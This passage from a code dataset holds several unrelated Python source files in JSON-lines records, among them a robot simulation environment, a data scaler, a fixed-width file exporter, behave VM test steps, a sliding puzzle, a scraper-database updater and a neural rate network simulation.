self._activate_event('slash_command_error', inter, err)\r\n return\r\n # Invoke the command\r\n try:\r\n await SCR.invoke(inter)\r\n except Exception as err:\r\n if 'slash_command_error' not in self.events:\r\n raise err\r\n await self._activate_event('slash_command_error', inter, err)\r\n \r\n # Aliases\r\n register_global_command = register_global_slash_command\r\n \r\n register_guild_command = register_guild_slash_command\r\n\r\n edit_global_command = edit_global_slash_command\r\n\r\n edit_guild_command = edit_guild_slash_command\r\n\r\n delete_global_command = delete_global_slash_command\r\n\r\n delete_guild_command = delete_guild_slash_command\r\n","sub_path":"dislash/slash_commands.py","file_name":"slash_commands.py","file_ext":"py","file_size_in_byte":23278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297508963","text":"import os\nimport time\nimport gym\nimport numpy as np\nfrom gym import spaces\nfrom tqdm import tqdm\nimport torch\nfrom neural_augmented_simulator.common.envs.pusher_envs import PusherVanillaEnv\nfrom neural_augmented_simulator.common.nas.models.networks import LstmNetRealv1\nGOAL_REACHED_DISTANCE = 0.01\nRESTART_EVERY_N_EPISODES = 1000\n\n\nclass PusherVanillaAugmentedEnv(PusherVanillaEnv):\n\n def __init__(self, headless=False, is_cuda=False):\n super(PusherVanillaAugmentedEnv, self).__init__(headless=headless)\n\n self.hidden_layers = 128\n self.lstm_layers = 3\n self.is_cuda = is_cuda\n self.model = LstmNetRealv1(\n n_input_state_sim=12,\n n_input_state_real=12,\n n_input_actions=3,\n nodes=self.hidden_layers,\n layers=self.lstm_layers)\n self.modified_obs = torch.zeros(1, 12).float()\n self.modified_actions = torch.zeros(1, 3).float()\n self.model_path = os.path.abspath('model-exp1-h128-l3-v{}-{}-{}e5.pth'.format(os.environ['variant'], os.environ['approach'],\n os.environ['noise_type']))\n print('------------------------------------------------------------')\n print('Model Path is : {}'.format(self.model_path))\n print('------------------------------------------------------------')\n\n if self.is_cuda:\n self.cuda_convert()\n self.load_model()\n # observation = 3 joints + 3 velocities + 2 puck position + 2 coordinates for target\n\n def cuda_convert(self):\n self.model = self.model.cuda()\n self.modified_obs = self.modified_obs.cuda()\n self.modified_actions = self.modified_actions.cuda()\n\n def load_model(self):\n return self.model.load_state_dict(torch.load(self.model_path)) \\\n if self.is_cuda else self.model.load_state_dict(torch.load(self.model_path, map_location='cpu'))\n\n def augment(self, last_obs, action, new_obs):\n last_obs = self.obs2lstm(last_obs)\n new_obs = self.obs2lstm(new_obs)\n self.modified_actions = action\n action = self.modified_actions.clone()\n\n input_tensor = torch.cat((last_obs, action, new_obs), 1).unsqueeze(0)\n with torch.no_grad():\n diff = self.model.forward(input_tensor)\n\n return diff.squeeze(0)\n\n def convert_to_tensor(self, numpy_array):\n return torch.FloatTensor(np.expand_dims(numpy_array, 0)).cuda() \\\n if self.is_cuda else torch.FloatTensor(np.expand_dims(numpy_array, 0))\n\n def obs2lstm(self, obs):\n self.modified_obs[:, :8] = obs[:, :8]\n return self.modified_obs.clone()\n\n def seed(self, seed=None):\n return [np.random.seed(seed)]\n\n def step(self, action):\n obs = super()._get_obs()\n new_obs, _, _, _ = super().step(action)\n\n obs = self.convert_to_tensor(obs)\n # print('observation is {}: '.format(obs))\n action = self.convert_to_tensor(action)\n new_obs = self.convert_to_tensor(new_obs)\n obs_diff = self.augment(obs, action, new_obs)\n corrected_obs = new_obs[:, :6] + obs_diff[:, :6]\n new_obs[:, :6] = corrected_obs\n corrected_obs = corrected_obs.cpu().numpy().squeeze(0)\n new_obs = new_obs.cpu().numpy()\n self._set_state_(corrected_obs[:6])\n\n reward, done, dist = super()._getReward()\n\n return new_obs, reward, done, {\"distance\": dist}\n\n def reset(self, forced=False):\n self.model.zero_hidden() # !important\n self.model.hidden = (self.model.hidden[0].detach(),\n self.model.hidden[1].detach())\n return super().reset()\n\n\nif __name__ == '__main__':\n import gym\n import gym_ergojr\n import time\n\n env = gym.make(\"ErgoPusherAugmented-Graphical-v1\")\n MODE = \"manual\"\n r = range(100)\n\n # env = gym.make(\"ErgoPusher-Headless-v1\")\n # MODE = \"timings\"\n # r = tqdm(range(10000))\n\n env.reset()\n\n timings = []\n ep_count = 0\n\n start = time.time()\n\n for _ in r:\n while True:\n action = env.action_space.sample()\n obs, rew, done, misc = env.step(action)\n\n if MODE == \"manual\":\n # print(\"act {}, obs {}, rew {}, done {}\".format(\n # action, obs, rew, done))\n\n time.sleep(0.01)\n\n if MODE == \"timings\":\n ep_count += 1\n if ep_count >= 10000:\n diff = time.time() - start\n tqdm.write(\"avg. fps: {}\".format(\n np.around(10000 / diff, 3)))\n np.savez(\"timings.npz\", time=np.around(10000 / diff, 3))\n ep_count = 0\n start = time.time()\n\n if done:\n env.reset()\n break\n","sub_path":"neural_augmented_simulator/common/envs/pusher_augmented.py","file_name":"pusher_augmented.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496725487","text":"from enum import Enum\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.preprocessing\n\nfrom .util.dtype import toFloatArray\n\n\nclass NormalisationMode(Enum):\n NONE = \"none\"\n MAX_ALL = \"max_all\"\n MAX_BY_COLUMN = \"max_by_column\"\n STANDARDISED = \"standardised\"\n\n\nclass VectorDataScaler:\n def __init__(self, dataFrame: pd.DataFrame, normalisationMode: NormalisationMode):\n self.normalisationMode = normalisationMode\n self.scale, self.translate = self._computeScalingParams(dataFrame.values, normalisationMode)\n self.dimensionNames = list(dataFrame.columns)\n\n @staticmethod\n def _computeScalingParams(rawArray: np.ndarray, normalisationMode: NormalisationMode):\n \"\"\"\n :param rawArray: numpy array containing raw data\n :param normalisationMode: the normalization mode (0=none, 1=by maximum in entire data set, 2=by separate maximum in each column)\n \"\"\"\n if len(rawArray.shape) != 2:\n raise ValueError(\"Only 2D arrays are supported\")\n dim = rawArray.shape[1]\n translate = None\n if normalisationMode == NormalisationMode.NONE:\n scale = None\n elif normalisationMode == NormalisationMode.MAX_ALL:\n scale = np.ones(dim) * np.max(rawArray)\n elif normalisationMode == NormalisationMode.MAX_BY_COLUMN:\n scale = np.ones(dim)\n for i in range(dim):\n scale[i] = np.max(np.abs(rawArray[:, i]))\n elif normalisationMode == NormalisationMode.STANDARDISED:\n standardScaler = sklearn.preprocessing.StandardScaler()\n standardScaler.fit(rawArray)\n translate = standardScaler.mean_\n scale = standardScaler.scale_\n else:\n raise Exception(\"Unknown normalization mode\")\n return scale, translate\n\n @staticmethod\n def _array(data: Union[pd.DataFrame, np.ndarray]):\n return toFloatArray(data)\n\n\n def getNormalisedArray(self, data: Union[pd.DataFrame, np.ndarray]) -> np.ndarray:\n result = self._array(data)\n if self.translate is not None:\n result = result - self.translate\n if self.scale is not None:\n result = result / self.scale\n return result\n\n def getDenormalisedArray(self, data: Union[pd.DataFrame, np.ndarray]) -> np.ndarray:\n result = self._array(data)\n if self.scale is not None:\n result = result * self.scale\n if self.translate is not None:\n result = result + self.translate\n return result\n","sub_path":"src/sensai/normalisation.py","file_name":"normalisation.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"274295492","text":"import os\nimport pandas as pd\nimport re\n\nPATH = os.path.abspath('.')\nDATA_DIR = os.path.join(PATH, 'data')\nFILENAME = 'seguros_59_final.csv'\nCOD_COOP = '5024'\nCOD_PROD = '59'\nNOME_PROD = 'SEGUROS'\nDATA_ARQUIVO = '20210330'\nTIPO_INFO = '41'\nANO_REF = '2020'\n\ndef adjust_str_size(s, size, type):\n s = str(s)\n if len(s) > size:\n return s[:size]\n elif len(s) < size:\n if type == 'n':\n qtt = size - len(s)\n return qtt * '0' + s\n if type == 'a':\n qtt = size - len(s)\n return s + qtt * ' '\n return s\n\ndef read_and_convert_to_str(file):\n df = pd.read_csv(os.path.join(DATA_DIR, file), sep=';', encoding='utf-8', decimal=',')\n for col in df.columns:\n if df[col].dtype == 'float64':\n df[col] = df[col].astype('str')\n df[col] = df[col].apply(lambda x: re.sub('[^\\sA-Za-z0-9]+', '', x))\n df[col] = df[col].apply(lambda x: x + '0' if len(x) < 3 else x)\n df[col] = df[col].astype('str')\n df[col] = df[col].apply(lambda x: re.sub('[^\\sA-Za-z0-9]+', '', x)) \n return df\n\ndef generate_header(cod_coop, cod_prod, desc_prod, data_arquivo, seq):\n return '0' + str(cod_coop) + str(cod_prod) + adjust_str_size(desc_prod, 30, 'a') + str(data_arquivo) + (388 * ' ') \\\n + adjust_str_size(seq, 7, 'n') + '\\r\\n'\n\ndef generate_trailler(qtt_reg, seq):\n return '9' + adjust_str_size(qtt_reg, 6, 'n') + (426 * ' ') + adjust_str_size(seq, 7, 'n') + '\\r\\n'\n\ndef generate_detalhe(id_negocio, n_cliente, cpf_cnpj, nome_cliente, cod_prod, cod_mod_prod, tipo_info, ano, val_jan, val_fev,\n val_mar, val_abr, val_mai, val_jun, val_jul, val_ago, val_set, val_out, val_nov, val_dez, n_matricula,\n seq):\n \n return '1' + adjust_str_size(id_negocio, 50, 'a') + adjust_str_size(n_cliente, 7, 'n') + adjust_str_size(cpf_cnpj, 14, 'n') \\\n + adjust_str_size(nome_cliente, 40, 'a') + str(cod_prod) + adjust_str_size(cod_mod_prod, 3, 'n') + adjust_str_size(tipo_info, 5, 'n') \\\n + str(ano) + adjust_str_size(val_jan, 17, 'n') + adjust_str_size(val_fev, 17, 'n') + adjust_str_size(val_mar, 17, 'n') \\\n + adjust_str_size(val_abr, 17, 'n') + adjust_str_size(val_mai, 17, 'n') + adjust_str_size(val_jun, 17, 'n') \\\n + adjust_str_size(val_jul, 17, 'n') + adjust_str_size(val_ago, 17, 'n') + adjust_str_size(val_set, 17, 'n') \\\n + adjust_str_size(val_out, 17, 'n') + adjust_str_size(val_nov, 17, 'n') + adjust_str_size(val_dez, 17, 'n') \\\n + adjust_str_size(n_matricula, 10, 'n') + (93 * ' ') + adjust_str_size(seq, 7, 'n') + '\\r\\n'\n\ninf_f = read_and_convert_to_str(FILENAME)\ncounter = 2\nf_name = COD_COOP + '_' + COD_PROD + '_' + adjust_str_size(inf_f.iloc[1, 1], 2, 'n') + '_INFACUM_' + DATA_ARQUIVO[4:6] + DATA_ARQUIVO[:4] + '.txt'\n\nwith open(f_name, 'a') as f:\n f.write(generate_header(COD_COOP, COD_PROD, NOME_PROD, DATA_ARQUIVO, 1))\n for ind in inf_f.index:\n f.write(generate_detalhe(\n inf_f.iloc[ind, 18],\n inf_f.iloc[ind, 3],\n inf_f.iloc[ind, 2],\n inf_f.iloc[ind, 5],\n COD_PROD,\n inf_f.iloc[ind, 1],\n TIPO_INFO,\n ANO_REF,\n inf_f.iloc[ind, 6],\n inf_f.iloc[ind, 7],\n inf_f.iloc[ind, 8],\n inf_f.iloc[ind, 9],\n inf_f.iloc[ind, 10],\n inf_f.iloc[ind, 11],\n inf_f.iloc[ind, 12],\n inf_f.iloc[ind, 13],\n inf_f.iloc[ind, 14],\n inf_f.iloc[ind, 15],\n inf_f.iloc[ind, 16],\n inf_f.iloc[ind, 17],\n inf_f.iloc[ind, 4],\n ind + 2\n ))\n counter += 1\n f.write(generate_trailler(len(inf_f), counter))\n f.close()\n\n","sub_path":"infacum_exporter.py","file_name":"infacum_exporter.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563140578","text":"import os\nimport subprocess\nfrom behave import *\nfrom hamcrest import *\n\n# Wait for a while, as we may be downloading the image as well\nVM_WAIT_TIME=60 * 10\nif os.getenv(\"CI\") is not None:\n DEFAULT_TRANSIENT_ARGS = [\"-ssh-timeout\", \"300\"]\n DEFAULT_QEMU_ARGS = [\"-m\", \"1G\", \"-smp\", \"2\"]\nelse:\n DEFAULT_TRANSIENT_ARGS = []\n DEFAULT_QEMU_ARGS = [\"-m\", \"1G\", \"-smp\", \"2\", \"-enable-kvm\", \"-cpu\", \"host\"]\n\ndef build_command(context):\n config = context.vm_config\n command = [\"transient\", *DEFAULT_TRANSIENT_ARGS]\n\n if \"name\" in config:\n command.extend([\"-name\", config[\"name\"]])\n\n if \"images\" in config:\n command.extend([\"-image\", *config[\"images\"]])\n\n if \"ssh-command\" in config:\n command.extend([\"-ssh-command\", config[\"ssh-command\"]])\n\n if \"ssh-console\" in config:\n command.extend([\"-ssh-console\"])\n\n if \"prepare-only\" in config:\n command.extend([\"-prepare-only\"])\n\n if \"image-frontend\" in config:\n command.extend([\"-image-frontend\", config[\"image-frontend\"]])\n\n if \"image-backend\" in config:\n command.extend([\"-image-backend\", config[\"image-backend\"]])\n\n if \"shared-folder\" in config:\n command.extend([\"-shared-folder\", *config[\"shared-folder\"]])\n\n if \"ssh-with-serial\" in config:\n command.extend([\"-ssh-with-serial\"])\n\n command.extend([\"--\", *DEFAULT_QEMU_ARGS])\n\n return command\n\ndef run_vm(context):\n command = build_command(context)\n handle = subprocess.Popen(command, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n context.handle = handle\n return context.handle\n\ndef wait_on_vm(context, timeout=VM_WAIT_TIME):\n context.handle.wait(timeout)\n context.stdout = context.handle.stdout.read().decode('utf-8')\n context.stderr = context.handle.stderr.read().decode('utf-8')\n\n@given('a transient vm')\ndef step_impl(context):\n context.vm_config = {}\n\n@given('a name \"{name}\"')\ndef step_impl(context, name):\n context.vm_config[\"name\"] = name\n\n@given('a disk image \"{image}\"')\ndef step_impl(context, image):\n if \"images\" not in context.vm_config:\n context.vm_config[\"images\"] = [image]\n else:\n context.vm_config[\"images\"].append(image)\n\n@given('a ssh console')\ndef step_impl(context):\n context.vm_config[\"ssh-console\"] = True\n\n@given('a ssh-with-serial console')\ndef step_impl(context):\n context.vm_config[\"ssh-with-serial\"] = True\n\n@given('a ssh command \"{command}\"')\ndef step_impl(context, command):\n context.vm_config[\"ssh-command\"] = command\n\n@given('the vm is prepare-only')\ndef step_impl(context):\n context.vm_config[\"prepare-only\"] = True\n\n@given('a frontend \"{frontend}\"')\ndef step_impl(context, frontend):\n context.vm_config[\"image-frontend\"] = frontend\n\n@given('a backend \"{backend}\"')\ndef step_impl(context, backend):\n context.vm_config[\"image-backend\"] = backend\n\n@given('a sshfs mount of \"{}\"')\ndef step_impl(context, mount):\n if \"shared-folder\" not in context.vm_config:\n context.vm_config[\"shared-folder\"] = [mount]\n else:\n context.vm_config[\"shared-folder\"].append(mount)\n\n@when('the vm runs to completion')\n@when('the transient command is run')\ndef step_impl(context):\n run_vm(context)\n wait_on_vm(context)\n\n@when('the vm runs')\ndef step_impl(context):\n run_vm(context)\n\n@when('the vm is provided stdin')\ndef step_impl(context):\n text = context.text + \"\\n\"\n context.handle.stdin.write(text.encode('utf-8'))\n context.handle.stdin.close()\n\n@when('we wait for the vm to exit')\ndef step_impl(context):\n wait_on_vm(context)\n\n@then('the return code is {code}')\ndef step_impl(context, code):\n if context.handle.returncode != int(code):\n print(\"command stdout:\")\n print(context.stdout)\n print(\"command stderr:\")\n print(context.stderr)\n assert_that(context.handle.returncode, equal_to(int(code)))\n\n@then('stdout contains \"{expected_stdout}\"')\ndef step_impl(context, expected_stdout):\n assert_that(context.stdout, contains_string(expected_stdout))\n\n@then('the file \"{name}\" is in the backend')\ndef step_impl(context, name):\n items = os.listdir(context.vm_config[\"image-backend\"])\n assert_that(items, has_item(name))\n\n@then('the file \"{name}\" is in the frontend')\ndef step_impl(context, name):\n items = os.listdir(context.vm_config[\"image-frontend\"])\n assert_that(items, has_item(name))\n","sub_path":"test/features/steps/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"424682470","text":"# Sliding Puzzle\nimport random\n\nclass Reader :\n @staticmethod\n def get_number(size) :\n num = input(\"Type the number you want to move (Type 0 to quit): \")\n while not (num.isdigit() and 0 <= int(num) <= size * size - 1) :\n num = input(\"Type the number you want to move (Type 0 to quit): \")\n return int(num)\n\nclass SlidingBoard :\n def __init__(self, size) :\n self.__board = SlidingBoard.create_board(SlidingBoard.create_init_board(size))\n self.__empty = self.find_position(0)\n\n @property\n def board(self) :\n return self.__board\n\n @staticmethod\n def create_board(numbers) :\n board = []\n for r in range(4) :\n k = r * 4\n row = numbers[k:k+4]\n board.append(numbers[k:k+4])\n return board\n\n @staticmethod\n def create_init_board(size) :\n numbers = [n for n in range(size * size)]\n random.shuffle(numbers)\n return numbers\n\n @staticmethod\n def create_goal_board(size) :\n numbers = [n for n in range(size * size)]\n numbers[-1] = 0\n return numbers\n\n def find_position(self, num) :\n for i in range(len(self.__board)) :\n for j in range(len(self.__board)) :\n if num == self.__board[i][j] :\n return(i, j)\n\n def move(self, pos) :\n (x,y) = pos\n if self.__empty in ((x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)) :\n self.__board[self.__empty[0]][self.__empty[1]] = self.__board[x][y]\n self.__board[x][y] = 0\n self.__empty = pos\n else:\n print(\"Can't move! Try again.\")\n\n def print_board(self) :\n print(\"S | 0 1 2 3\")\n print(\"- + -----------\")\n i = 0\n for row in self.__board :\n print(i, \"|\", end = ' ')\n for item in row :\n if item == 0:\n print(\" \", end = \" \")\n elif 10 <= item <= 15 :\n print(item,end = \" \")\n else :\n print(str(item).rjust(2),end=\" \")\n print()\n i += 1\n\nclass SlidingPuzzleController() :\n def __init__(self, size) :\n self.__slider = SlidingBoard(size)\n self.__goal = SlidingBoard.create_board(SlidingBoard.create_goal_board(size))\n self.__size = size\n\n def play(self) :\n while True:\n self.__slider.print_board()\n if self.__slider.board == self.__goal :\n print(\"Congratulations!\")\n break\n num = Reader.get_number(self.__size) # get number between 0 and 15\n if num == 0 :\n break\n pos = self.__slider.find_position(num)\n self.__slider.move(pos)\n print(\"Please come again.\")\n\ndef main() :\n import sys\n size = sys.argv[1]\n if size.isdigit() and int(size) > 1 :\n SlidingPuzzleController(int(size)).play()\n else :\n print(\"Not aproper system argument.\")\n\nmain()","sub_path":"[CSE1017] Programming-Basics/Practice/Practice 9.py","file_name":"Practice 9.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477177870","text":"import sys\nimport pickle\n\nfile_path = None\nout_path = None\nrum_dir_name = None\nnon_rum_dir_name = None\nif len(sys.argv) >= 5:\n file_path = sys.argv[1]\n out_path = sys.argv[2]\n rum_dir_name = sys.argv[3]\n non_rum_dir_name = sys.argv[4]\nelse:\n print(\"arguments not passed completely\")\n\n\ndef add_one_id_needed(cat_id, triad_list):\n if cat_id not in [single_triad[0] for single_triad in triad_list]:\n return triad_list + [(cat_id, 1)]\n else:\n new_triad_list = []\n\n for single_triad in triad_list:\n if single_triad[0] != cat_id:\n new_triad_list.append(single_triad)\n else:\n new_triad_list.append((single_triad[0], single_triad[1] + 1))\n\n return new_triad_list\n\n\nif file_path is not None:\n file = open(file_path, \"r\")\n file_content = file.read()\n file_rows = file_content.split(\"\\n\")\n\n # dictionary\n dictionary = {}\n\n number_of_docs = 0\n for row in file_rows:\n if len(row) > 0:\n if row[0] == \"/\":\n number_of_docs += 1\n\n # category-id pair uniques a document\n cat_id_pair = None\n for row in file_rows:\n if len(row) > 0:\n if row[0] == \"/\":\n split_row = row.split(\"/\")\n if rum_dir_name in split_row:\n cat_id_pair = (rum_dir_name, split_row[len(split_row) - 1])\n else:\n cat_id_pair = (non_rum_dir_name, split_row[len(split_row) - 1])\n else:\n for word in row.split():\n if word not in dictionary.keys():\n dictionary.update({\n word: {\n \"df\": 1,\n \"occurrences\": [\n (cat_id_pair, 1)\n ],\n \"nd\": number_of_docs\n }\n })\n else:\n df_increment_value = 0\n if cat_id_pair not in [triad[0] for triad in dictionary[word][\"occurrences\"]]:\n df_increment_value = 1\n\n dictionary.update({\n word: {\n \"df\": dictionary[word][\"df\"] + df_increment_value,\n \"occurrences\": add_one_id_needed(cat_id_pair, dictionary[word][\"occurrences\"]),\n \"nd\": number_of_docs\n }\n })\n file.close()\n\n out_file = open(out_path, \"wb\")\n pickle.dump(dictionary, out_file)\n out_file.close()\n","sub_path":"python_modules/create_dictionary.py","file_name":"create_dictionary.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"58657654","text":"#!/usr/bin/python\n# Programmer : zhuxp\n# Date: \n# Last-modified: 30 Jun 2012 01:15:18\nfrom xplib.Annotation import Bed\nimport types\ndef BedIterator(handle):\n if type(handle)==type(\"s\"):\n try:\n handle=open(handle,\"r\")\n except:\n raise ValueError(\"Can't open file %s\"%handle)\n for line in handle:\n line=line.strip()\n if line[0]==\"#\": continue\n x=line.split(\"\\t\")\n b=Bed(x)\n yield b\n return\n \n","sub_path":"lib/xplib/TableIO/BedIO.py","file_name":"BedIO.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629642785","text":"import pymysql\nimport os\nimport urllib.request\nimport sys\nimport requests\n\ndef get_prt_content_from_table():\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"suning\")\n cursor = db.cursor()\n db.set_charset(\"utf8\")\n cursor.execute(\"SET NAMES utf8;\")\n cursor.execute(\"SET CHARACTER SET utf8;\")\n cursor.execute(\"SET character_set_connection=utf8;\")\n sql=\"select table_id,prt_id,prt_title,prt_desc from suning_prt_data\"\n try:\n cursor.execute(sql)\n data = cursor.fetchall()\n return data\n except Exception as err:\n db.rollback()\n print('---------------Error------Message--------:' + str(err))\n cursor.close()\n db.close()\n\ndef update_prt_content(table_id,content):\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"suning\")\n cursor = db.cursor()\n db.set_charset(\"utf8\")\n cursor.execute(\"SET NAMES utf8;\")\n cursor.execute(\"SET CHARACTER SET utf8;\")\n cursor.execute(\"SET character_set_connection=utf8;\")\n sql = \"update suning_prt_data set prt_content='%s' where table_id='%s' \" %(content,table_id)\n try:\n cursor.execute(sql)\n db.commit()\n except Exception as err:\n db.rollback()\n print('---------update_prt_content------Error------Message--------:' + str(err))\n cursor.close()\n db.close()\n\nif __name__==\"__main__\":\n #从数据库获取整体的数据\n data=get_prt_content_from_table()\n for i in range(len(data)):\n #print(data[i])table_id,prt_id,prt_title,prt_desc\n table_id=data[i][0]\n prt_id=data[i][1]\n prt_title=data[i][2]\n prt_desc = data[i][3]\n\n #如何干掉prt_desc\n prt_text=prt_desc.split(\"introduceEdit=\")[-1].split('\" width')[0]\n print(prt_text)\n\n s=requests.get(prt_text)\n content = s.content.decode('utf-8')\n print(content)\n update_prt_content(table_id,content)\n\n\n","sub_path":"suning/苏宁后台/获取详情内容html.py","file_name":"获取详情内容html.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"625231431","text":"#!/usr/bin/python3\n\nimport os\nimport shutil\n\nbase_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"\")\n\ndef copy(fr: str, to: str, _file: bool=True):\n if not _file:\n shutil.copytree(base_dir + fr, to)\n else:\n shutil.copy2(base_dir + fr, to)\n print(f\"copy: {fr} => {to} done...\")\n\ntry:\n copy(\"kangaroo-app\", \"/usr/share/kangaroo-app\", False)\n copy(\"kangaroo-uninstall\", \"/usr/bin/\")\n copy(\"kangaroo\", \"/usr/bin/\")\n copy(\"kangaroo.desktop\", \"/usr/share/applications/\")\nexcept PermissionError:\n print(\"! PermissionError: run this script as root or use sudo\")\n","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649876713","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 29 15:26:04 2021\n\n@author: olive\n\"\"\"\n\n#------------------------------------------------------------------------------ \n# Necessary modules\n#------------------------------------------------------------------------------ \nfrom __future__ import division\n \nimport numpy as np\nimport matplotlib.pyplot as plt \nfrom numpy.random import normal as rnorm \n\np={} # Parameter dictionary\n#------------------------------------------------------------------------------ \n# Network Parameters\n#------------------------------------------------------------------------------ \n\np['beta_exc'] = 0.066 # Hz/pA\np['beta_inh'] = 0.351 # Hz/pA\n# Let us remember that we are keeping this as constant\np['tau_exc'] = 20 # ms # \np['tau_inh'] = 10 # ms\np['wEE'] = 24.3 # pA/Hz\np['wIE'] = 12.2 # pA/Hz\np['wEI'] = 19.7 # pA/Hz\np['wII'] = 12.5 # pA/Hz\np['muEE'] = 33.7 # pA/Hz\np['muIE'] = 25.3 # pA/Hz\np['eta'] = 0.68\n\n\n####### ROI = 29 areas ################ \n\nwith open(\"/home/olive/Desktop/LSN/Jog/distMatval.txt\") as f:\n contents=f.readlines()\nDISTmtx =np.array([[float(k) for k in i.split()] for i in contents]) \n\nwith open(\"/home/olive/Desktop/LSN/Jog/flnMatshuf2.txt\") as f:\n contents=f.readlines()\nFLN=np.array([[float(k) for k in i.split()] for i in contents]) \n\nareas=['V1','V2','V4','DP','MT','8m','5','8I','TEO','2','F1','STPc','7A','46d',\n '10','9/46v','9/46d','F5','TEpd','PBr','7m','7B','F2','STPi','PROm','F7',\n '8B','STPr','24c']\n\nhier=np.array([[0,0.2,0.45,0.5,0.51,0.55,0.58,0.6,0.61,0.63,0.67,\n 0.7,0.72,0.73,0.76,0.78,0.8,0.83,0.85,0.86,0.87,\n 0.95,0.96,0.965,0.97,0.98,0.985,0.99,1]])\n\np['hier_vals'] = hier\np['fln_mat']=FLN\np['areas']=areas\n\n \np['n_area']=len(p['areas'])\np['exc_scale'] = (1+p['eta']*p['hier_vals'])\n# Sign function\nfI = lambda x : x*(x>0) # f-I curve\n\n\n########### Choose the injection area\n\n\narea_act = 'V1'\nprint('Running network with stimulation to ' + area_act)\n\n \n# Definition of combined parameters\n\nlocal_EE = p['beta_exc'] * p['wEE'] * p['exc_scale']\nlocal_EI = -p['beta_exc'] * p['wEI']\nlocal_IE = p['beta_inh'] * p['wIE'] * p['exc_scale']\nlocal_II = -p['beta_inh'] * p['wII']\n\nfln_scaled = (p['exc_scale'] * p['fln_mat'].T).T\n\n\n\n#---------------------------------------------------------------------------------\n# Simulation Parameters\n#---------------------------------------------------------------------------------\n\n# White noise input parameters\n\nme=2\nSD=0.5 # Hz\n\n\n\ndt = 0.2 # ms\nT = 2500 # ms\nt_plot = np.linspace(0, T, int(T/dt)+1)\nn_t = len(t_plot)\n\nE_back=10 # Back-ground rate for excitation\nI_back=35 # Back-ground rate for inhibition\n\n# From target background firing inverts background inputs\nr_exc_tgt = E_back * np.ones(p['n_area'])\nr_inh_tgt = I_back * np.ones(p['n_area'])\n\nlongrange_E = np.dot(fln_scaled,r_exc_tgt)\nI_bkg_exc = r_exc_tgt - (local_EE*r_exc_tgt + local_EI*r_inh_tgt\n + p['beta_exc']*p['muEE']*longrange_E)\nI_bkg_inh = r_inh_tgt - (local_IE*r_exc_tgt + local_II*r_inh_tgt\n + p['beta_inh']*p['muIE']*longrange_E)\n\n# White noise stimulus input\n\nI_stim_exc = np.zeros((n_t,p['n_area']))\n\narea_stim_idx = p['areas'].index(area_act) # Index of stimulated area\narea_no_stim=tuple([i for i in range(p['n_area']) if i != area_stim_idx])\n#time_idx = (t_plot>100) & (t_plot<=350)\nI_stim_exc[:,area_stim_idx] = rnorm(0,0.5,n_t)\nI_stim_exc[:,area_no_stim] = rnorm(0,0.00005,(n_t,p['n_area']-1))\n# Above value chosen so that V1 is driven up to 100 Hz\n\n#---------------------------------------------------------------------------------\n# Storage\n#---------------------------------------------------------------------------------\n\nr_exc = np.zeros((n_t,p['n_area']))\nr_inh = np.zeros((n_t,p['n_area']))\n\n#---------------------------------------------------------------------------------\n# Initialization\n#---------------------------------------------------------------------------------\n\n# Set activity to background firing\nr_exc[0] = r_exc_tgt\nr_inh[0] = r_inh_tgt\n\n#---------------------------------------------------------------------------------\n# Running the network\n#---------------------------------------------------------------------------------\n\nfor i_t in range(1, n_t):\n longrange_E = np.dot(fln_scaled,r_exc[i_t-1])\n print(longrange_E)\n I_exc = (local_EE*r_exc[i_t-1] + local_EI*r_inh[i_t-1] +\n p['beta_exc'] * p['muEE'] * longrange_E +\n I_bkg_exc + I_stim_exc[i_t])\n \n I_inh = (local_IE*r_exc[i_t-1] + local_II*r_inh[i_t-1] +\n p['beta_inh'] * p['muIE'] * longrange_E + I_bkg_inh)\n\n d_r_exc = -r_exc[i_t-1] + fI(I_exc)\n d_r_inh = -r_inh[i_t-1] + fI(I_inh)\n\n r_exc[i_t] = r_exc[i_t-1] + d_r_exc * dt/p['tau_exc']\n r_inh[i_t] = r_inh[i_t-1] + d_r_inh * dt/p['tau_inh']\n\n\n##############################################################################\n########################### PLOTTING RESULTS #################################\n############################################################################## \n\n\n### Neural rate series plots\n\n_ = plt.figure(figsize=(4,4))\narea_name_list = p['areas']\narea_idx_list = [-1]+[p['areas'].index(name) for name in area_name_list]\nf, ax_list = plt.subplots(len(area_idx_list), sharex=True)\n\nfor ax, area_idx in zip(ax_list, area_idx_list):\n if area_idx < 0:\n y_plot = I_stim_exc[:, area_stim_idx]\n txt = 'Input'\n else:\n y_plot = r_exc[:,area_idx]\n txt = p['areas'][area_idx]\n\n y_plot = y_plot - y_plot.min()\n ax.plot(t_plot, y_plot)\n ax.text(0.9, 0.6, txt, transform=ax.transAxes)\n\n ax.set_yticks([y_plot.max()])\n ax.set_yticklabels(['{:0.4f}'.format(y_plot.max())])\n 